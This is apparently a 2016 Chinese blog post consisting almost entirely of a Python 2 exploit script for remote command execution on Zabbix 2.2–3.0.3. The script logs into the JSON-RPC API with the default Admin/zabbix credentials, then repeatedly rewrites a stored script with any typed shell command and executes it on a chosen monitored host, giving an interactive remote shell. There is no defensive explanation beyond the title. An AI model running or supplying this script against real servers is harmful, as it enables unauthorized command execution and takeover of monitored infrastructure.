Zabbix RCE with API JSON-RPC

测试脚本:

 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3


import requests
import json
import sys


def verify(url,hostid):
    url = url + '/api_jsonrpc.php'    ### Don't edit

    login = 'Admin'        ### Zabbix login
    password = 'zabbix'    ### Zabbix password

    ### auth
    payload = {
           "jsonrpc" : "2.0",
        "method" : "user.login",
        "params": {
            'user': ""+login+"",
            'password': ""+password+"",
        },
           "auth" : None,
        "id" : 0,
    }
    headers = {
        'content-type': 'application/json',
    }

    auth  = requests.post(url, data=json.dumps(payload), headers=(headers))
    auth = auth.json()

    while True:
        cmd = raw_input(':~  ')
        if cmd == "" : print "Result of last command:"
        if cmd == "quit" : break

    ### update
        payload = {
            "jsonrpc": "2.0",
            "method": "script.update",
            "params": {
                "scriptid": "1",
                "command": ""+cmd+""
            },
            "auth" : auth['result'],
            "id" : 0,
        }

        cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers))

    ### execute
        payload = {
            "jsonrpc": "2.0",
            "method": "script.execute",
            "params": {
                "scriptid": "1",
                "hostid": ""+hostid+""
            },
            "auth" : auth['result'],
            "id" : 0,
        }

        cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers))
        cmd_exe = cmd_exe.json()
        print cmd_exe["result"]["value"]


if __name__ == '__main__':
    url = sys.argv[1]
    hostid = sys.argv[2]
    verify(url,hostid)

测试截图:

posted @ 2016-07-29 13:27  persuit  阅读(1051)  评论(0编辑  收藏  举报